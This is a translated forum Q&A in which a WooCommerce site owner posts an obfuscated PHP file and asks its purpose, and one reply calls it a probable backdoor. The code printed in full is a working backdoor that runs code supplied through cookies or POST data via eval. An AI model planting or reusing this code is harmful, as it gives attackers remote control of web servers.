WordPress核心中未知的php文件

时间:2019-02-11 作者:Rashid Rcp

我的woo commerce网站包含一个未知的PHP文件,我无法找到它的用途。

下面是代码示例,

<?php
$qyxrjyu = \'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\\\'\';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}
谁能解释一下这些代码的目的是什么?

谢谢

1 个回复
SO网友:Krzysiek Dróżdż

这绝对不是WordPress的文件。

这是一个带有模糊代码的文件,因此很难读取和说出它的确切功能。

很可能是后门或其他恶意文件,以免攻击者/恶意软件感染您的服务器。

相关推荐